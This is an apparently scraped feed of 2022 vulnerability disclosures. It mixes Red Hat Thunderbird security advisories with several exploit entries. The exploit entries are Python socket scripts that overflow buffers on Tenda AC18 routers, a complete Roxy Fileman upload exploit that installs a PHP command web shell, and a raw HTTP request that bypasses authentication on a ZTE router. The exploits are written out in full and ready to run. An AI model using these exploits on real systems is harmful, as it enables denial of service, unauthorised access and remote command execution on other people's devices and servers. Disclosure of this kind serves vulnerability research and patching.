Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsStart function, which can be accessed through the URL goform/WifiWpsStart .

The index and mode are controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check,which leads to a stack overflow vulnerability. This vulnerability allows attackers to cause a Denial of Service (DoS).

**PoC**

Poc of Denial of Service(DoS)

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'mode=1&index=' + p1

p3 \= b"POST /goform/WifiWpsStart" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2
r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44177: IoT_vuln/Tenda/AC18/formWifiWpsStart at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetWifiGuestBasic function, which can be accessed through the URL goform/SetWifiGuestBasic.

In formSetWifiGuestBasic function, v14 is controllable and will be passed into the sub_7EA98 function. In the sub_7EA98 function, a2 will be spliced into s by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

In set_wl_guest_qos_list function

In sub_7EA98 function

**PoC**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'shareSpeed=' + p1

p3 \= b"POST /goform/SetWifiGuestBasic" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: curShow=; ac\_login\_info=passwork; test=A; password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44183: IoT_vuln/Tenda/AC18/formSetWifiGuestBasic at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsOOB function, which can be accessed through the URL goform/WifiWpsOOB .

The index is controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check, which leads to a stack overflow vulnerability. An attacker can obtain a stable root shell through a carefully constructed payload.

**PoC**

Poc of Denial of Service(DoS)

POST /goform/WifiWpsOOB HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos\_pw=eee:language=cn

index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-44178: IoT_vuln/Tenda/AC18/formWifiWpsOOB at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter.

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the addWifiMacFilter function, which can be accessed via the URL goform/addWifiMacFilter.

deviceId, deviceMac, are controllable and will be copied to nptr by sprintf. It is worth noting that the size is not checked, resulting in a stack overflow vulnerability.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'device\_id=1&device\_mac=' + p1
p3 \= b"POST /goform/addWifiMacFilter" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44180: IoT_vuln/Tenda/AC18/addWifiMacFilter at main · RobinWang825/IoT_vuln

An update for thunderbird is now available for Red Hat Enterprise Linux 9.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-45403: Mozilla: Service Workers might have learned size of cross-origin media files
* CVE-2022-45404: Mozilla: Fullscreen notification bypass
* CVE-2022-45405: Mozilla: Use-after-free in InputStream implementation
* CVE-2022-45406: Mozilla: Use-after-free of a JavaScript Realm
* CVE-2022-45408: Mozilla: Fullscreen notification bypass via windowName
* CVE-2022-45409: Mozilla: Use-after-free in Garbage Collection
* CVE-2022-45410: Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy
* CVE-2022-45411: Mozilla: Cross-Site Tracing was possible via non-standard override headers
* CVE-2022-45412: Mozilla: Symlinks may resolve to partially uninitialized buffers
* CVE-2022-45416: Mozilla: Keystroke Side-Channel Leakage
* CVE-2022-45418: Mozilla: Custom mouse cursor could have been drawn over browser UI
* CVE-2022-45420: Mozilla: Iframe contents could be rendered outside the iframe
* CVE-2022-45421: Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-11-21

Updated:

2022-11-21

**RHSA-2022:8561 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: thunderbird security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for thunderbird is now available for Red Hat Enterprise Linux 9.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Mozilla Thunderbird is a standalone mail and newsgroup client.  

This update upgrades Thunderbird to version 102.5.0.  

Security Fix(es):  

*   Mozilla: Service Workers might have learned size of cross-origin media files (CVE-2022-45403)
*   Mozilla: Fullscreen notification bypass (CVE-2022-45404)
*   Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)
*   Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)
*   Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)
*   Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)
*   Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5 (CVE-2022-45421)
*   Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy (CVE-2022-45410)
*   Mozilla: Cross-Site Tracing was possible via non-standard override headers (CVE-2022-45411)
*   Mozilla: Symlinks may resolve to partially uninitialized buffers (CVE-2022-45412)
*   Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)
*   Mozilla: Custom mouse cursor could have been drawn over browser UI (CVE-2022-45418)
*   Mozilla: Iframe contents could be rendered outside the iframe (CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to take effect.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 9 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 9 s390x
*   Red Hat Enterprise Linux for Power, little endian 9 ppc64le
*   Red Hat Enterprise Linux for ARM 64 9 aarch64

**Fixes**

*   BZ - 2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files
*   BZ - 2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass
*   BZ - 2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation
*   BZ - 2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm
*   BZ - 2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName
*   BZ - 2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection
*   BZ - 2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy
*   BZ - 2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers
*   BZ - 2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers
*   BZ - 2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage
*   BZ - 2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI
*   BZ - 2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe
*   BZ - 2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

**CVEs**

*   CVE-2022-45403
*   CVE-2022-45404
*   CVE-2022-45405
*   CVE-2022-45406
*   CVE-2022-45408
*   CVE-2022-45409
*   CVE-2022-45410
*   CVE-2022-45411
*   CVE-2022-45412
*   CVE-2022-45416
*   CVE-2022-45418
*   CVE-2022-45420
*   CVE-2022-45421

**Red Hat Enterprise Linux for x86\_64 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

x86\_64

thunderbird-102.5.0-2.el9\_1.x86\_64.rpm

SHA-256: 70b6eebb386c9eb020625c9780e9e575eb148ab24936c165e55e9fc95c697cff

thunderbird-debuginfo-102.5.0-2.el9\_1.x86\_64.rpm

SHA-256: 5cad7b166fe1c17f212715e592368e246b5dda584ac54aed93088a3839e0aa4d

thunderbird-debugsource-102.5.0-2.el9\_1.x86\_64.rpm

SHA-256: cd71bbf884ca097133417982d0c8fb8c46337bfb610d5c91660c6f2219c23640

**Red Hat Enterprise Linux for IBM z Systems 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

s390x

thunderbird-102.5.0-2.el9\_1.s390x.rpm

SHA-256: 983aeb700304f1b5721c132cf8f630374b2b74a9a40e1b9aaba1ed862ff3a697

thunderbird-debuginfo-102.5.0-2.el9\_1.s390x.rpm

SHA-256: e1cbde81ef158b577194e2d0f35afe34731773c7331907f3f8bb26289e4fc0f9

thunderbird-debugsource-102.5.0-2.el9\_1.s390x.rpm

SHA-256: 8e674898bf06b79a08831630f28fd72b9dd4da6f55ad657dcd36ac2801af4da0

**Red Hat Enterprise Linux for Power, little endian 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

ppc64le

thunderbird-102.5.0-2.el9\_1.ppc64le.rpm

SHA-256: ee77c89721799a4b8a71f31c56c7954f1e9faceca21b8aeea3dfa7e4a1dcc8a8

thunderbird-debuginfo-102.5.0-2.el9\_1.ppc64le.rpm

SHA-256: b6535c2da488533f177e3676c5271b79b88e83cf52a828892a2197d922694dbe

thunderbird-debugsource-102.5.0-2.el9\_1.ppc64le.rpm

SHA-256: 7f687085d541662362a89be5699452cc4f0136f7784250a69cdb9c095a78a2bb

**Red Hat Enterprise Linux for ARM 64 9**

SRPM

thunderbird-102.5.0-2.el9\_1.src.rpm

SHA-256: bb8a19c6612592f70e0d80fa7513c20f6b469458372de38cb02521b563cdb53c

aarch64

thunderbird-102.5.0-2.el9\_1.aarch64.rpm

SHA-256: 6cedfac8f79fe89bffe1288bfc80502164a504ba381b123363a5fadb2a9a7e14

thunderbird-debuginfo-102.5.0-2.el9\_1.aarch64.rpm

SHA-256: 8855243382d1d825a03276c28b9ae072c49478aa13f0b978e64fd558008441f3

thunderbird-debugsource-102.5.0-2.el9\_1.aarch64.rpm

SHA-256: 80088b35459faad75bcffa52e85f2a41880b257be060255dc04f914b4fdfd02e

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:8561: Red Hat Security Advisory: thunderbird security update

Roxy Fileman versions 1.4.6 and below remote shell upload proof of concept exploit.

    # Exploit Title: Roxy Fileman <= 1.4.6 Arbitrary File Upload (Unathenticated)# Date: 11/12/2022# Exploit Author: Hadi Mene <hadi_mene@hotmail.com># Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20210126213412/https://roxyfileman.com/download.php?f=1.4.6-php# Version: <= 1.4.6# Tested on: Ubuntu 18.04 # CVE : CVE-2022-40797# https://nvd.nist.gov/vuln/detail/CVE-2022-40797 import requestsfrom optparse import OptionParserfrom os.path import basenamebanner =  '#################################################\n'banner += '# Roxy Fileman <= 1.4.6 Arbitrary File Upload   #\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\tCVE-2022-40797 exploit code\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#  Author : Hadi Mene <hadi_mene@hotmail.com>\t#\n'banner += '#\t\t\t\t\t\t#\n'banner += '#################################################\n'parser = OptionParser()parser.add_option("-u", "--url", dest="url",                  help="url of roxy fileman installation")parser.add_option("-s", "--shell",dest="shell", default=False,                  help="path of the php shell if not specified defaut shell will be uploaded ")(options, args) = parser.parse_args()if options.url is None:  parser.error('URL is required use -h for help')url = options.url#It seems that in some versions of the app an '/' in the end of the url breaks the exploit codeif (url.endswith('/')):  url = url[:-1] # we delete that '/'  webroot = options.url.split('/')[3:]webroot = '/'+ '/'.join(webroot)if (webroot.endswith('/')):  webroot = webroot[:-1]  webroot = webroot+'/Uploads'if options.shell:  shell = open(options.shell,'r').read()  filename = basename(options.shell)  filename = filename.split('.')[0]  else:  # default shell  shell = "<?php system($_GET['cmd']); ?>"  filename = 'shell'headers = {    'Host': (url.split('/')[2]),    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0',    'Accept': '*/*',    'Accept-Language': 'en-US,en;q=0.5',    'Content-Type': 'multipart/form-data; boundary=---------------------------39556237418830295983527604767',    'Origin': (url.split('/')[2]),    'Connection': 'close',}data = '-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="method"\r\n\r\najax\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="d"\r\n\r\n'+(webroot)+'\r\n-----------------------------39556237418830295983527604767\r\nContent-Disposition: form-data; name="files[]"; filename="'+(filename)+'.phar"\r\nContent-Type: text/plain\r\n\r\n'+shell+'\n\r\n-----------------------------39556237418830295983527604767--\r\n'#We check if a file with the same filename is already there #because Roxy doesn't overwrite file instead it changes the filename of the newly uploaded fileif 'href="'+filename+'.phar"' in (requests.get(url+'/Uploads/').text):  already_uploaded = Trueelse:  already_uploaded = False  # file uploadreq = requests.post(url+'/php/upload.php', headers=headers, data=data, verify=False)response = (req.text)print(banner)if '{"res":"ok","msg":""}' in (response):# success  print('File Uploaded Successfully!!!')    if already_uploaded:    print('A file with the same filename is already on the server..')    print('URL: '+url+'/Uploads/'+(filename)+' - Copy X.phar ')      else:    print('URL: '+url+'/Uploads/'+(filename)+'.phar')else:  # failure  print('Shell Upload Failed :((( ')  print(response) #debug

Roxy Fileman 1.4.6 Remote Shell Upload

ZTE ZXHN-H108NS router with firmware version H108NSV1.0.7u_ZRD_GR2_A68 suffers from an authentication bypass vulnerability when alternate HTTP methods are leveraged.

    # Exploit Title: Router ZTE-H108NS - Authentication Bypass# Date: 19-11-2022# Exploit Author: George Tsimpidas # Vendor: https://www.zte.com.cn/global/# Firmware: H108NSV1.0.7u_ZRD_GR2_A68# CVE: N/A # Tested on: Debian 5.18.5Description :When specific http methods are listed within a security constraint,then only thosemethods are protected. Router ZTE-H108NS defines the following httpmethods: GET, POST, and HEAD. HEAD method seems to fall under a flawedoperation which allows the HEAD to be implemented correctly with everyResponse Status Code.Proof Of Concept :Below request bypasses successfully the Basic Authentication, andgrants access to the Administration Panel of the Router.HEAD /cgi-bin/tools_admin.asp  HTTP/1.1Host: 192.168.1.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: closeCookie: SESSIONID=1cd6bb77Upgrade-Insecure-Requests: 1Cache-Control: max-age=0

ZTE ZXHN-H108NS Authentication Bypass

Red Hat Security Advisory 2022-8543-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.5.0. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:8543-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8543  
Issue date:        2022-11-21  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405   
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409   
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412   
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420   
                   CVE-2022-45421   
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.5.0.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
thunderbird-102.5.0-2.el8_2.src.rpm

aarch64:  
thunderbird-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.aarch64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.aarch64.rpm

ppc64le:  
thunderbird-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.ppc64le.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.ppc64le.rpm

x86_64:  
thunderbird-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debuginfo-102.5.0-2.el8_2.x86_64.rpm  
thunderbird-debugsource-102.5.0-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
